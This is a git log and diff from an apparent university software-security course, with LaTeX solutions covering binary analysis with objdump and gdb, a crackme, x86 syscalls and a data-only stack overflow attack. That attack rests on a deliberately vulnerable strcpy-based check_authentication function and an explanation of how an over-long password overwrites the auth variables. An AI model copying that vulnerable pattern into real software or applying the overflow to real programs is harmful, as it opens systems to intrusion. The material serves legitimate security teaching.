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Author SHA1 Message Date
Sascha Tommasone
2343da8d1e
[Assignment-7] fix missing semicolon
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2024-07-08 13:05:20 +02:00
9acbc8be3e master: abgabe 7 pdf
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2024-07-08 12:50:16 +02:00
Sascha Tommasone
005d529757
[Assignment-7] remove redundant code
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2024-07-08 12:44:02 +02:00
f9258b4e55
master: abgabe 7 wrong curve mentioned
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2024-07-08 12:42:17 +02:00
Sascha Tommasone
ea22e2fb99
[Assignment-7] fix README.md
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2024-07-08 12:34:37 +02:00
65ce338921 Merge pull request 'Assignment 7' (#4) from Assignment-7 into master
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Reviewed-on: #4
2024-07-08 11:19:48 +02:00
Sascha Tommasone
18cc163954 [Assignment-7] fixed missing abgabe.pdf 2024-07-08 11:19:48 +02:00
Sascha Tommasone
e8ad2e0abb [Assignment-7] fixed missing abgabe.pdf; fixed repo link in README.md 2024-07-08 11:19:48 +02:00
Sascha Tommasone
d2f1a1e04b [Assignmnt-7] rename directory 2024-07-08 11:19:48 +02:00
Sascha Tommasone
f9b49a2119 [Assignment-7] fixed README.md 2024-07-08 11:19:48 +02:00
445e42f4d3 [Assignment-7] Add License / Copy Notices 2024-07-08 11:19:48 +02:00
chronal
f54a8e5567 Assignment 7 sgximpl: refactor README for project needs 2024-07-08 11:19:48 +02:00
chronal
9879feb09b Assignment 7 sgximpl: README update 2024-07-08 11:19:48 +02:00
chronal
97f1ecfe9f Assignment 7 sgximpl: GNU GPLv3 License 2024-07-08 11:19:48 +02:00
Sascha Tommasone
fc0438e5dd [Assignment-7] final 2024-07-08 11:19:48 +02:00
chronal
ff8779256c Assignment 7 sgximpl: readme compilation hint 2024-07-08 11:19:48 +02:00
chronal
f088d661af Assignment 7 sgximpl: README.md compiling 2024-07-08 11:19:48 +02:00
Sascha Tommasone
c9b6e749a7 [Assignment-7] update Makefile and simulate.sh 2024-07-08 11:19:48 +02:00
Sascha Tommasone
00b8bf74af [Assignment-7] setup script 2024-07-08 11:19:48 +02:00
Sascha Tommasone
c1b780e41f [Assignment-7] cleanup 2024-07-08 11:19:48 +02:00
Sascha Tommasone
10a1119eb4 [Assignment-7] cleanup 2024-07-08 11:19:48 +02:00
Sascha Tommasone
3c3671a579 [Assingment-7] updated simulate.sh 2024-07-08 11:19:48 +02:00
04fda7586f [Assignment-7] update simulate.sh 2024-07-08 11:19:48 +02:00
2829fdad19 [Assignment-7] add simulate.sh 2024-07-08 11:19:48 +02:00
c3c1de2811 [Assignment-7] small changes 2024-07-08 11:19:48 +02:00
Sascha Tommasone
1b83c83a4f [Assignment-7] fixed typo 2024-07-08 11:19:48 +02:00
b901e63f99 [Assignment-7] add keys of Bob and Oskar 2024-07-08 11:19:48 +02:00
Sascha Tommasone
6a1ee981e1 [Assignment-7] added embedded device to main.c; adjusted parameter parsing 2024-07-08 11:19:48 +02:00
Sascha Tommasone
83d943940c [Assignment-7] add embedded_device_syntax; add .h 2024-07-08 11:19:48 +02:00
c1bdc5b079 [Assignment-7] update flake and add missing enclave files 2024-07-08 11:19:48 +02:00
Sascha Tommasone
90ea867646 [Assignment-7] adjusted some error messages 2024-07-08 11:19:48 +02:00
Sascha Tommasone
a4303acdf6 [Assignment-7] embedded_device 2024-07-08 11:19:48 +02:00
36ce364e2d [Assignment-7] cleanup 2024-07-08 11:19:48 +02:00
feb0bd1b73 [Assignment-7] app restructure and cleanup 2024-07-08 11:19:48 +02:00
Sascha Tommasone
9cd7ef8703 [Assignment-7] . 2024-07-08 11:19:48 +02:00
Sascha Tommasone
c99556a595 [Assignment-7] embedded device prototype 2024-07-08 11:19:48 +02:00
Sascha Tommasone
05ea23459f [Assignment-7] . 2024-07-08 11:19:48 +02:00
f573b0c28a [Assignment-7] add keys of alice 2024-07-08 11:19:48 +02:00
Sascha Tommasone
bb11ef02e4 [Assignment-7] fixed header spelling 2024-07-08 11:19:48 +02:00
355e8560f6 [Assignment-7] working implementation of untrusted 2024-07-08 11:19:48 +02:00
Sascha Tommasone
e3daea6279 [Assignment-7] added missing comma 2024-07-08 11:19:48 +02:00
Sascha Tommasone
f865836630 [Assignment-7] fixed endianess of staff public key 2024-07-08 11:19:48 +02:00
Sascha Tommasone
3b2b203415 [Assignment-7] add first staff public key; enabled request verification 2024-07-08 11:19:48 +02:00
Sascha Tommasone
04e2894de0 [Assignment-7] fixed wrong data size parameter given to sgx_ecdsa_sign 2024-07-08 11:19:48 +02:00
Sascha Tommasone
c1351d4853 [Assignment-7] hardcoded public key/signatures sizes; cleaned up unused code 2024-07-08 11:19:48 +02:00
Sascha Tommasone
20529e2768 [Assignment-7] fixed endianess problems 2024-07-08 11:19:48 +02:00
6d966e0b94 [Assignment-7] App Intermediary and Proxy
- Intermediary is fully functional
- Proxy is ready until invocation of enclave
2024-07-08 11:19:48 +02:00
Sascha Tommasone
b41976a5ff [Assignment-7] changes to .edl .h based on enclave.c 2024-07-08 11:19:48 +02:00
Sascha Tommasone
79dbf59cee [Assignment-7] modified makefile 2024-07-08 11:19:48 +02:00
Sascha Tommasone
7dfa8b9e37 [Assignment-7] update verify_firmware 2024-07-08 11:19:48 +02:00
Sascha Tommasone
59e6be83c7 [Assignment-7] update sign_firmware 2024-07-08 11:19:48 +02:00
Sascha Tommasone
fd31523ce5 [Assignment-7] new function 'static sgx_status_t verify_signature' 2024-07-08 11:19:48 +02:00
Sascha Tommasone
9364000b83 [Assignment-7] (un)seal_key_pair now static functions 2024-07-08 11:19:48 +02:00
Sascha Tommasone
9cd8b37cc5 [Assignment-7] authorized public keys 2024-07-08 11:19:48 +02:00
6779eb608e [Assignment-7] Repair Flake 2024-07-08 11:19:48 +02:00
25a5ca3e2d [Assignment-7] Flake + App base
- Add Assignment-7 to flake.nix
- Implement basic framework of app
- Implement proxy subcommand (mostly)
- Implement basics of intermediary subcommand
2024-07-08 11:19:48 +02:00
Sascha Tommasone
0d6b13fafa [Assignment-7] prototype verify_firmware 2024-07-08 11:19:48 +02:00
Sascha Tommasone
7a592dc225 [Assignment-7] sign_firmware: removed dynamic memory allocations; added sealing of key after creation; uint8_t *sealed is now two way pointer; improved error handling 2024-07-08 11:19:48 +02:00
Sascha Tommasone
8da66bea12 [Assignment-7] public_key: renamed to get_public_key; improved error handling 2024-07-08 11:19:48 +02:00
Sascha Tommasone
3ea3076945 [Assignment-7] unseal_key_pair: removed dynamic memory allocations; removed unused parameter; improved error handling 2024-07-08 11:19:48 +02:00
Sascha Tommasone
97dfb2b82e [Assignment-7] seal_key_pair: removed dynamic memory allocations; fixed pointer usage 2024-07-08 11:19:48 +02:00
Sascha Tommasone
83ad706ad7 [Assignment-7] size ecalls 2024-07-08 11:19:48 +02:00
Sascha Tommasone
6aaaa3de9a [Assignment-7] improved error handling; add (un)sealing prototypes 2024-07-08 11:19:48 +02:00
Sascha Tommasone
cb380685a8 [Assignment-7] security fix in sign_firmware 2024-07-08 11:19:48 +02:00
Sascha Tommasone
5e0d13b84e [Assignment-7] add seal prototype 2024-07-08 11:19:48 +02:00
Sascha Tommasone
7ef4e42ef9 [Assignment-7] add prototype 'sgx_status_t public_key' 2024-07-08 11:19:48 +02:00
Sascha Tommasone
07254a8036 [Assignment-7] sign_firmware returns signature 2024-07-08 11:19:48 +02:00
Sascha Tommasone
76d8d4a2f4 [Assignment-7] add first enclave part 2024-07-08 11:19:48 +02:00
chronal
4a5261f6ec Assignment 7 sgximl: lib 2024-07-08 11:19:48 +02:00
chronal
0023864b0a Assignment 7 sgximpl don't ignore lib/ 2024-07-08 11:19:48 +02:00
chronal
01182627e0 Assignment 7 sgximpl: initialize project structure 2024-07-08 11:19:48 +02:00
chronal
133fb803f7
Assignment 7: abgabe neue formulierung
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2024-07-07 22:13:20 +02:00
chronal
32014ead42
Assignment 7 sgximpl: abgabe grafiken für besseres Verständnis
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2024-07-07 19:19:08 +02:00
chronal
d768d965d5
Assignment 7 sgximpl: uncomplete project description
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2024-07-07 17:07:46 +02:00
Sascha Tommasone
4c9de6da37
[Assignment-7] add rsa blinding against time based side channel attacks
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2024-06-29 21:14:06 +02:00
ba8e969470
[Assignment-7] add SGX sample code from VM
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2024-06-29 17:55:44 +02:00
Sascha Tommasone
5616ddc4e5
[Assignment-7] add rsa_verify
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2024-06-29 16:46:07 +02:00
Sascha Tommasone
4d6d39df95
[Assigment-7] basic rsa implementation
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2024-06-29 16:10:15 +02:00
Sascha Tommasone
9df8ca5810
[Assignment-7] sha256 implementation
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2024-06-29 12:00:22 +02:00
chronal
7046987a6f
Assignment 7: initialisation
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2024-06-28 16:41:35 +02:00
d7c5c2b778 Merge pull request 'Assignment-6' (#3) from Assignment-6 into master
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Reviewed-on: #3
2024-06-28 16:35:35 +02:00
be0436eb59
[Assignment-6] fix wrong links in footnote
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2024-06-24 13:31:58 +02:00
4f86df92e1
Rechtschreibung und Zeichensetzung üben wir noch mal
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2024-06-24 13:14:18 +02:00
Sascha Tommasone
731478bcdf
[Assignment-6] solution task 7 (stack canaries)
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2024-06-23 23:04:14 +02:00
Sascha Tommasone
8ab148a95f
[Assignment-6] solution task 6 again (nop sliding) 2024-06-23 23:00:27 +02:00
fa4873f427
[Assignment-6] Task 6b solution.sh
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2024-06-23 18:05:53 +02:00
3f475f91f3
ci
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2024-06-23 13:07:47 +02:00
459d71216a
[Assignment-6] Nachtrag Task 6
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2024-06-23 13:04:20 +02:00
61c2d83c03
[Assignment-6] Nachtrag Task 5
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2024-06-23 12:20:33 +02:00
0d1dcf5b1e
[Assignment-6] Task 5 and 6 and flake change
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In Task 5 ist sind noch vier Byte nicht benutzt, die laut
Aufgabenstellung scheinbar vorgesehen sind. Mit padded_password, saved
ebp, return address und input komme ich auf 36 Byte, in der vorgegebenen
Tabelle ist aber Platz für 40.
2024-06-23 11:57:12 +02:00
Sascha Tommasone
8e4f6932e5
[Assignment-6] setup task 7 (stack canaries)
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2024-06-14 16:47:22 +02:00
Sascha Tommasone
cf06a6813e
[Assignment-6] solution task 6 (nop sliding)
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Sascha Tommasone
c609af3329
[Assignment-6] setup task 6 (nop sliding) 2024-06-14 16:39:15 +02:00
Sascha Tommasone
55f0505296
[Assignment-6] solution task 8 (return-to-libc)
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Sascha Tommasone
d3b2ded31a
[Assignment-6] setup task 8 (return-to-libc) 2024-06-14 15:57:52 +02:00
Sascha Tommasone
185ca930bc
[Assignment-6] solution task 6 (basic buffer overflow attack)
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2024-06-14 15:52:09 +02:00
Sascha Tommasone
7b0dba85f0
[Assignment-6] setup task 6 (basic buffer overflow attack) 2024-06-14 15:51:53 +02:00
cb3a96510a Merge pull request 'Assignment-5' (#2) from Assignment-5 into master
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Reviewed-on: #2
2024-06-10 14:32:31 +02:00
1f18ccb927
Assignment 5 finshed
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2024-06-10 13:41:44 +02:00
65ebf1a52c
Assignment 5 finshed
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252bf43abf Assignment 5 - Software Security - Teil 1/abgabe.tex aktualisiert
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2024-06-10 13:16:35 +02:00
Sascha Tommasone
c8eef2fc34
[Assignment-5] added text solutioks 4 (data-only atty attack)
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2024-06-09 22:31:37 +02:00
Sascha Tommasone
63d0a88ba8
[Assignment-5] updated solution task 3 (shellcode) 2024-06-09 19:37:58 +02:00
4a70af2f7b
ci: use host runner
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2024-06-09 19:32:32 +02:00
chronal
e8edfc9f39
Assignment 5 Berarbeitung Aufgabe 1 wip
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2024-06-09 19:17:16 +02:00
67 changed files with 4272 additions and 42 deletions

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@ -5,17 +5,16 @@ on:
workflow_dispatch: workflow_dispatch:
jobs: jobs:
build-latex: build-latex:
runs-on: debian-latest runs-on: nixos
strategy: strategy:
matrix: matrix:
assignment: [ assignment: [
"Assignment 4 - Protokollsicherheit (Praxis)", "Assignment 4 - Protokollsicherheit (Praxis)",
"Assignment 5 - Software Security - Teil 1" "Assignment 5 - Software Security - Teil 1",
"Assignment 6 - Software Security - Teil 2"
] ]
steps: steps:
- uses: actions/checkout@v3 - uses: actions/checkout@v3
- uses: DeterminateSystems/nix-installer-action@main
- uses: DeterminateSystems/magic-nix-cache-action@main
- run: "nix build .#\"${{ matrix.assignment }}\"" - run: "nix build .#\"${{ matrix.assignment }}\""
- uses: actions/upload-artifact@v3 - uses: actions/upload-artifact@v3
with: with:

1
.gitignore vendored
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@ -24,7 +24,6 @@ dist/
downloads/ downloads/
eggs/ eggs/
.eggs/ .eggs/
lib/
lib64/ lib64/
parts/ parts/
sdist/ sdist/

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@ -1,4 +0,0 @@
# Latex Outputs
*.log
*.synctex.gz
*.pdf

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@ -12,6 +12,7 @@
\usepackage{algpseudocode} \usepackage{algpseudocode}
\usepackage{xifthen} \usepackage{xifthen}
\usepackage{xcolor} \usepackage{xcolor}
\usepackage{pdfpages}
\usepackage[a4paper,lmargin={2cm},rmargin={2cm},tmargin={2.5cm},bmargin = {2.5cm},headheight = {4cm}]{geometry} \usepackage[a4paper,lmargin={2cm},rmargin={2cm},tmargin={2.5cm},bmargin = {2.5cm},headheight = {4cm}]{geometry}
\usepackage{amsmath,amssymb,amstext,amsthm} \usepackage{amsmath,amssymb,amstext,amsthm}
\usepackage[shortlabels]{enumitem} \usepackage[shortlabels]{enumitem}
@ -21,6 +22,29 @@
\usepackage{etoolbox} \usepackage{etoolbox}
\usepackage{tikz} \usepackage{tikz}
\definecolor{keyword}{rgb}{0.0, 0.0, 1.0}
\definecolor{comment}{rgb}{0.5, 0.5, 0.5}
\definecolor{string}{rgb}{0.6, 0.1, 0.1}
\definecolor{background}{rgb}{0.95, 0.95, 0.95}
\lstset{
language=bash,
backgroundcolor=\color{background},
basicstyle=\ttfamily\small,
keywordstyle=\color{keyword}\bfseries,
commentstyle=\color{comment}\itshape,
stringstyle=\color{string},
tabsize=2,
showspaces=false,
showstringspaces=false,
frame=single,
numbers=left,
numberstyle=\tiny\color{gray},
breaklines=true,
captionpos=b,
escapeinside={(*@}{@*)},
}
\usetikzlibrary{shapes, arrows, calc, automata, arrows.meta, positioning,decorations.pathmorphing,backgrounds,decorations.markings,decorations.pathreplacing, graphs} \usetikzlibrary{shapes, arrows, calc, automata, arrows.meta, positioning,decorations.pathmorphing,backgrounds,decorations.markings,decorations.pathreplacing, graphs}
\usetikzlibrary{matrix,shapes,arrows,positioning,chains, calc} \usetikzlibrary{matrix,shapes,arrows,positioning,chains, calc}
\usetikzlibrary{arrows.meta,matrix,shapes,arrows,positioning,chains, calc} \usetikzlibrary{arrows.meta,matrix,shapes,arrows,positioning,chains, calc}
@ -70,8 +94,196 @@
\sheetnr{5} \sheetnr{5}
% <-- Anpassen % % <-- Anpassen %
\begin{document} \begin{document}
\begin{exercise}[Analyse von Binärdaten]{1}
\begin{subexercises}
\item Der Output von \texttt{objdump} mit der \texttt{secret} Funktion extrahiert.
\begin{lstlisting}[language=bash]
user@intro:~$ objdump -d intro | awk -v RS= '/^[[:xdigit:]]+ <secret>/'
0000120d <secret>:
120d: f3 0f 1e fb endbr32
1211: 55 push %ebp
1212: 89 e5 mov %esp,%ebp
1214: 8b 45 08 mov 0x8(%ebp),%eax
1217: 8d 50 ff lea -0x1(%eax),%edx
121a: 89 d0 mov %edx,%eax
121c: 01 c0 add %eax,%eax
121e: 01 d0 add %edx,%eax
1220: 83 c0 05 add $0x5,%eax
1223: 5d pop %ebp
1224: c3 ret
\end{lstlisting}
\item Man kann durch den Command \lstinline[language=bash]{gdb -x commands} gdb mit der Datei \texttt{commands} ausgeben.
\begin{figure}[H]
\begin{lstlisting}[]
# Lines starting with a '#' symbol are comments
# Do not remove this intial line; it will disable pagination
set pagination off
# TODO: your commands go here
# read in the intro binary
file intro
# breakpoint at secret
break secret
# run program with paramter value 5
r 5
# read eax register
i r eax
stepi 6
# after 5. instruction
i r eax
stepi
# after 6. instruction
i r eax
stepi
# after 7. instruction
i r eax
stepi
# after 8. instruction
i r eax
# continue program to end
continue
# END of your commands
# Do not remove the final quit; it will exit GDB automatically
quit
\end{lstlisting}
\caption[short]{Inhalt der command Datei}
\end{figure}
Dabei wird zuerst die Datei \texttt{intro} in gdb eingelesen.
Anschließend wird ein Breakpoint bei der Funktion secret gesetzt.
Dann wird das Programm mit dem Parameter gestartet und, wie in der Aufgabe gewollt, wird das Register eax an verschiedenen Stellen ausgelesen.
Der Ausgabewert der Funktion ist dann 17.
\\
\begin{lstlisting}[language=bash]
user@intro:~$ gdb -x commands
GNU gdb (Ubuntu 9.2-0ubuntu1~20.04.1) 9.2
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
Breakpoint 1 at 0x120d: file intro.c, line 5.
Breakpoint 1, secret (num=5) at intro.c:5
5 intro.c: No such file or directory.
eax 0x5 5
0x5655621c 6 in intro.c
eax 0x4 4
0x5655621e 6 in intro.c
eax 0x8 8
6 in intro.c
eax 0xc 12
7 in intro.c
eax 0x11 17
[Inferior 1 (process 630) exited normally]
\end{lstlisting}
\item Für die Herleitung der Funktion werden zuerst ein paar Probewerte genommen.
\begin{align*}
f(0) &= 2\\
f(3) &= 11\\
f(4) &= 14\\
f(5) &= 17\\
f(7) &= 23\\
\end{align*}
Die Funktion $f(n)$ muss eine konstante 2 haben, da $f(0) = 2$.
Anschließend gehe man davon aus, dass $f(n)$ linear sei. Dann müsste $f(n) = an + 2$ sein.
Das gilt genau dann, wenn der ggT aller Paare $(n, f(n) - 2)$ für jeden Wert gleich ist. Das gilt mit $\forall n \in \mathbb{N} : ggT(n, f(n) - 2) = 3$.
Also:
\begin{align*}
f(n) = 3n + 2
\end{align*}
\newpage
\item Das Programm liefert den Output
\begin{lstlisting}[language=bash]
user@intro:~$ readelf -S intro
There are 36 section headers, starting at offset 0x413c:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
[ 1] .interp PROGBITS 000001b4 0001b4 000013 00 A 0 0 1
[ 2] .note.gnu.build-i NOTE 000001c8 0001c8 000024 00 A 0 0 4
[ 3] .note.gnu.propert NOTE 000001ec 0001ec 00001c 00 A 0 0 4
[ 4] .note.ABI-tag NOTE 00000208 000208 000020 00 A 0 0 4
[ 5] .gnu.hash GNU_HASH 00000228 000228 000020 04 A 6 0 4
[ 6] .dynsym DYNSYM 00000248 000248 0000a0 10 A 7 1 4
[ 7] .dynstr STRTAB 000002e8 0002e8 0000a7 00 A 0 0 1
[ 8] .gnu.version VERSYM 00000390 000390 000014 02 A 6 0 2
[ 9] .gnu.version_r VERNEED 000003a4 0003a4 000030 00 A 7 1 4
[10] .rel.dyn REL 000003d4 0003d4 000060 08 A 6 0 4
[11] .rel.plt REL 00000434 000434 000020 08 AI 6 24 4
[12] .init PROGBITS 00001000 001000 000024 00 AX 0 0 4
[13] .plt PROGBITS 00001030 001030 000050 04 AX 0 0 16
[14] .plt.got PROGBITS 00001080 001080 000010 10 AX 0 0 16
[15] .plt.sec PROGBITS 00001090 001090 000040 10 AX 0 0 16
[16] .text PROGBITS 000010d0 0010d0 000249 00 AX 0 0 16
[17] .fini PROGBITS 0000131c 00131c 000018 00 AX 0 0 4
[18] .rodata PROGBITS 00002000 002000 00001c 00 A 0 0 4
[19] .eh_frame_hdr PROGBITS 0000201c 00201c 000054 00 A 0 0 4
[20] .eh_frame PROGBITS 00002070 002070 00013c 00 A 0 0 4
[21] .init_array INIT_ARRAY 00003ec8 002ec8 000004 04 WA 0 0 4
[22] .fini_array FINI_ARRAY 00003ecc 002ecc 000004 04 WA 0 0 4
[23] .dynamic DYNAMIC 00003ed0 002ed0 000100 08 WA 7 0 4
[24] .got PROGBITS 00003fd0 002fd0 000030 04 WA 0 0 4
[25] .data PROGBITS 00004000 003000 000008 00 WA 0 0 4
[26] .bss NOBITS 00004008 003008 000004 00 WA 0 0 1
[27] .comment PROGBITS 00000000 003008 00002b 01 MS 0 0 1
[28] .debug_aranges PROGBITS 00000000 003033 000020 00 0 0 1
[29] .debug_info PROGBITS 00000000 003053 000369 00 0 0 1
[30] .debug_abbrev PROGBITS 00000000 0033bc 00011f 00 0 0 1
[31] .debug_line PROGBITS 00000000 0034db 00010a 00 0 0 1
[32] .debug_str PROGBITS 00000000 0035e5 0002b9 01 MS 0 0 1
[33] .symtab SYMTAB 00000000 0038a0 0004d0 10 34 51 4
[34] .strtab STRTAB 00000000 003d70 000271 00 0 0 1
[35] .shstrtab STRTAB 00000000 003fe1 000158 00 0 0 1
\end{lstlisting}
\item Die in dem Code angegebenen Labels können wie folgt eingeteilt werden:
\begin{enumerate}[<A>:]
\item Die statisch initialisierte Variable wird in der Section .data gespeichert. \\
\textbf{Grund:}
"This section holds initialized data that contribute to the program\'s memory image. This section is of type SHT\_PROGBITS. The attribute types are SHF\_ALLOC and SHF\_WRITE."\footnote[1]{Manual page elf(5)}
\item Die statisch nicht initialisierte Variable wird in der Section .bss gespeichert. \\
\textbf{Grund:}
"This section holds uninitialized data that contributes to the program\'s memory image. By definition, the system initializes the data with zeros when the program begins to run. This section is of type SHT\_NOBITS. The attribute types are SHF\_ALLOC and SHF\_WRITE."\footnotemark[1]
\item Ausführbare Code wird in der Section .text gespeichert. \\
\textbf{Grund:}
"This section holds the "text", or executable instructions, of a program. This section is of type SHT\_PROGBITS. The attributes used are SHF\_ALLOC and SHF\_EXECINSTR."\footnotemark[1]
\item Lokale Variablen werden auf dem Stack gespeichert.
\item Lokale Variablen werden auf dem Stack gespeichert.
\end{enumerate}
\end{subexercises}
\end{exercise}
\begin{exercise}[Crackme]{2} \begin{exercise}[Crackme]{2}
Die Funkion \lstinline{verify_key} leitet das Passwort aus einem geheimen Schlüssel ab, indem der ASCII-Wert jedes Zeichens, abhängig von dessen Position, verändert wird. Die Funktion \lstinline{verify_key} leitet das Passwort aus einem geheimen Schlüssel ab, indem der ASCII-Wert jedes Zeichens, abhängig von dessen Position, verändert wird.
Dem ASCII-Wert jedes Zeichens wird der doppelte Positionswert, bei 0 startend, abgezogen. Dem ASCII-Wert jedes Zeichens wird der doppelte Positionswert, bei 0 startend, abgezogen.
Die Funktion gibt den Wert \lstinline{1} zurück, falls das abgeleitete Passwort mit der konstanten Zeichenkette \lstinline{MMNNQ} übereinstimmt. Die Funktion gibt den Wert \lstinline{1} zurück, falls das abgeleitete Passwort mit der konstanten Zeichenkette \lstinline{MMNNQ} übereinstimmt.
@ -81,11 +293,87 @@
\begin{exercise}[System Calls und Shellcode]{3} \begin{exercise}[System Calls und Shellcode]{3}
\begin{subexercises} \begin{subexercises}
\item Ein Linux-Syscall auf der x86-Architektur ist als i386-Architektur in \lstinline{syscall(2)} der Linux Manpages spezifiziert. \item Ein Linux-Syscall auf der x86-Architektur ist als i386-Architektur in \lstinline{syscall(2)} der Linux Manpages spezifiziert.
oohhh
Dabei wird die Zahlenkennung des Syscalls in Register eax übergeben. Dabei wird die Zahlenkennung des Syscalls in Register eax übergeben.
Bis zu 6 Argumente können in den Registern \lstinline{ebx}, \lstinline{ecx}, \lstinline{edx}, \lstinline{esi}, \lstinline{edi} und \lstinline{ebp} übergeben werden. Bis zu 6 Argumente können in den Registern \lstinline{ebx}, \lstinline{ecx}, \lstinline{edx}, \lstinline{esi}, \lstinline{edi} und \lstinline{ebp} übergeben werden.
Mit dem Aufruf der Instruktion \lstinline{int $0x80} wird der Syscall ausgelöst und der Syscall-Handler im Kernel durch Auslösen eines Interrupts ausgeführt. Mit dem Aufruf der Instruktion \lstinline{int $0x80} wird der Syscall ausgelöst und der Syscall-Handler im Kernel durch Auslösen eines Interrupts ausgeführt.
Ausgaben des Syscalls werden in den Registern eax und edx zurückgegeben. Ausgaben des Syscalls werden in den Registern eax und edx zurückgegeben.
\end{subexercises} \end{subexercises}
\end{exercise} \end{exercise}
\lstset{
language=C,
basicstyle=\ttfamily\footnotesize,
keywordstyle=\color{blue},
commentstyle=\color{gray},
stringstyle=\color{red},
numbers=left,
numberstyle=\tiny\color{gray},
stepnumber=1,
numbersep=5pt,
backgroundcolor=\color{white},
showspaces=false,
showstringspaces=false,
showtabs=false,
frame=single,
tabsize=4,
captionpos=b,
breaklines=true,
breakatwhitespace=false,
escapeinside={\%*}{*)},
morekeywords={uint32_t, uint16_t, uint8_t} % Add keywords here
}
\begin{exercise}[Data-Only Attack]{4}
\begin{subexercises}
\item Im folgenden einmal die ursprüngliche und die gehärtete Funktion.
\begin{lstlisting}[caption={check\_authentication}, label={lst:check_authentication}]
int check_authentication(char *password) {
int auth_flag = 0;
char password_buffer[12];
strcpy (password_buffer, password);
if(strcmp(password_buffer, "swordfish") == 0)
auth_flag = 1;
return auth_flag;
}
\end{lstlisting}
\begin{lstlisting}[caption={hardened check\_authentication}, label={lst:hardened_check_authentication}]
int check_authentication(char *password) {
char x = 0, y = 0, z = 0;
char password_buffer[12];
strcpy(password_buffer, password);
if(strcmp(password_buffer, "swordfish") == 0) {
x = 0x21;
y = 0x6b;
z = 0x4f;
}
int auth_flag = 0;
if((x == 0x21) && (y == 0x6b) && (z == 0x4f)) {
auth_flag = 1;
}
return auth_flag;
}
\end{lstlisting}
Die gehärtete Funktion deklariert \texttt{auth\_flag} nicht mehr als Erstes innerhalb der Funktion. Stattdessen werden zunächst drei Variablen vom Typ \texttt{char} mit dem Wert 0 initialisiert. In der IF-Abfrage, in der das Passwort mit dem String \texttt{swordfish} verglichen wird, wird bei übereinstimmendem Passwort nicht mehr direkt \texttt{auth\_flag} auf 1 gesetzt. Stattdessen erhalten die drei zuvor deklarierten Variablen spezifische Werte. Anschließend wird \texttt{auth\_flag} mit 0 initialisiert. In einer zweiten IF-Abfrage wird überprüft, ob die drei Variablen die Werte aufweisen, die sie bei korrektem Passwort haben sollten. Falls dies der Fall ist, wird \texttt{auth\_flag} auf 1 gesetzt. Zum Abschluss wird \texttt{auth\_flag} zurückgegeben. Die nicht gehärtete Funktion, setzt direkt nach dem Vergleich den Rückgabewert, falls das Passwort korrekt ist, auf 1. Danach wird dieser zurückgegeben.
Da die 3 Variablen vor dem \texttt{password\_buffer} deklariert werden, liegen sie an einer höheren Speicheradresse im Stack. Somit überschreibt, falls der Input \texttt{char *password} einen String länger als 12 Byte enthält, die unsichere Funktion \texttt{strcpy} diese drei Variablen. Somit muss das Passwort 15 Byte lange sein (12 Byte Buffer + 3 Bytes). Die ersten zwölf Byte sorgen dafür, dass das 13. Byte die erste der drei Variablen überschreibt, etc. Somit müssen die 3 letzten Byte die Werte haben, auf die in der 2. IF-Abfrage geprüft wird, damit die \texttt{auth\_flag} auf 1 gesetzt wird. Die Endianess muss beachtet werden. Diese können mit einem Debugger einfach gefunden werden.
\item Anbei das ausgefüllte Speicherlayout. Anbei Bilder, die unser ausgefülltes Layout bestätigen.
Dem Bild kann entnommen werden, dass der Stack der Funktion \texttt{check\_authentication} bei \texttt{0xffffd500} startet und bis \texttt{0xffffd4e0} geht. Somit hat der Stack eine Größe von 32 (+4 Byte Parameter \texttt{@0xffffd500}), also 36 Byte. Außerdem kann dem Bild der aktuelle Stackinhalt entnommen werden. Der Stack ist keine 40 Byte groß, weshalb die Vorlage nicht genau passt und ein Speicherwort zu viel Platz ist.
\includegraphics[width=\textwidth]{gdb.png}
\includepdf[pages=1]{h5_ss24.pdf}
\end{subexercises}
\end{exercise}
\end{document} \end{document}

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@ -0,0 +1,272 @@
#1717414602
ls
#1717414605
cat commands
#1717415348
clear
#1717415350
ls
#1717415351
ls intro
#1717415354
./intro
#1717415361
objdump
#1717415381
objdump intro
#1717415420
objdump -d intro
#1717415434
man objdump
#1717415443
objdump -d=secret intro
#1717415453
objdump -d intro
#1717415900
man objdump
#1717415917
objdump -d -j=secret intro
#1717415921
man objdump
#1717415972
objdump -d -j=secret intro awk -v RS= '/^[[:xdigit:]]+ <myfunc>/'
#1717415994
objdump -d intro | awk -v RS= '/^[[:xdigit:]]+ <secret>/'
#1717939441
ls
#1717939451
cat commands
#1717939475
cat intro
#1717939479
clear
#1717939481
ls
#1717939483
ll
#1717939485
l
#1717939490
ls -la
#1717939492
ls -lh
#1717939514
cat .bash_history
#1717939524
objdump -d intro | awk -v RS= '/^[[:xdigit:]]+ <secret>/'
#1717939721
task help
#1717939731
task info
#1717939739
task id
#1717939745
task check
#1717939826
man gdb
#1717939894
gdb intro
#1717940125
clear
#1717940125
ls
#1717940129
gdb intro
#1717942144
ls
#1717942149
nano commands
#1717942239
task check
#1717942298
cat commands
#1717942311
clear
#1717942321
man gdb
#1717942339
nano commands
#1717942350
man gdb
#1717942403
gdb -x commands intro
#1717942416
nano commands
#1717942422
gdb -x commands intro
#1717942426
task check
#1717942451
gdb
#1717942499
nano commands
#1717942514
gdb -x commands intro
#1717942520
task check
#1717942557
nano commands
#1717942567
gdb -x commands intro
#1717942582
nano commands
#1717942590
gdb -x commands intro
#1717942602
task check
#1717942691
nano commands
#1717942711
gdb
#1717942722
ls
#1717942726
gdb intro
#1717942741
gdb
#1717942836
nano commands
#1717942847
gdb
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nano commands
#1717942862
gdb -x commands
#1717942872
task check
#1717942885
nano commands
#1717943082
gdb intro
#1717943152
nano commands
#1717943162
gdb -x commands
#1717943164
nano commands
#1717943179
gdb -x commands
#1717943183
clear
#1717943183
ls
#1717943186
task check
#1717943204
nano commands
#1717943214
task check
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nano commands
#1717943238
task check
#1717943241
task submit
#1717943604
gdb intro
#1717943679
objdump intro
#1717943687
objdump -D intro
#1717943691
objdump -d intro
#1717943870
objdump -d intro | awk -v RS= '/^[[:xdigit:]]+ <secret>/'
#1717943884
gdb intro
